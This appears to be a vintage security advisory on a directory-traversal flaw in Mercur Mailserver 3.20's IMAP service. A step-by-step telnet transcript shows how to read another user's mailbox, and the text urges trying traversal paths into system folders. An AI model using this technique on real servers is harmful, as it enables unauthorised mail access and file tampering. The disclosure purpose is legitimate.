COMMAND
Mercur Mailserver
SYSTEMS AFFECTED
Atrium Mercur Mailserver 3.20
PROBLEM
Leonid Medevedv found following. You can remotely read other
users email, you can remotely fill up server's HDD, you can
remotely put files anywhere on server (at least on drive, where
mail is stored) you can sometimes crash it's IMAP service...
Simple scenario: remote user1 manage mail in user2 mailbox and
even alter filesystem anywhere on server's HDD
we>telnet target.mercur.mailserver 143
server>* OK MERCUR IMAP4-Server (v3.20.02 Unregistered) for Windows NT ready
at Thu, 13 Apr 2000 20:08:31 +0400
we>000c login user1 password1
server>000c OK LOGIN completed
we>00ab select inbox/../../user2/inbox
server>* 1 EXISTS
server>* 0 RECENT
server>* OK [UNSEEN 0]
server>* OK [UIDVALIDITY 878969124]
server>* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
server>00ab OK [READ-WRITE] SELECT completed
we>000e uid fetch 1:*(rfc822.header rfc822.size uid flags internaldate)
server>* 1 FETCH (UID 879030620 RFC822.SIZE 867 FLAGS (\Seen) INTERNALDATE "12-Apr-2000 19:49:23 +0400")
server>* 2 FETCH (UID 879554127 RFC822.SIZE 1092 FLAGS (\Seen) INTERNALDATE "13-Apr-2000 19:46:19 +0400")
server>000e OK UID FETCH completed
we>000f uid fetch 879030620 (body.peek[] uid)
server> sends us user2 mail message
Voila! We can read ANY message in ANY known user mailbox or
folder. But this is not the end :) Mobilize your own fantazy and
try other IMAP commands - (especially that creates/deletes
folders and sends data to server) with paths like "..\..\..\..\.."
or "..\..\..\..\..\WINNT\SYSTEM32" or anything...
You not even need a telnet, and can try some IMAP-compliant mail
clients. Btw, Mercur IMAP service crashes several (not every)
times with paths, containing dots and slashes.
SOLUTION
Nothing yet.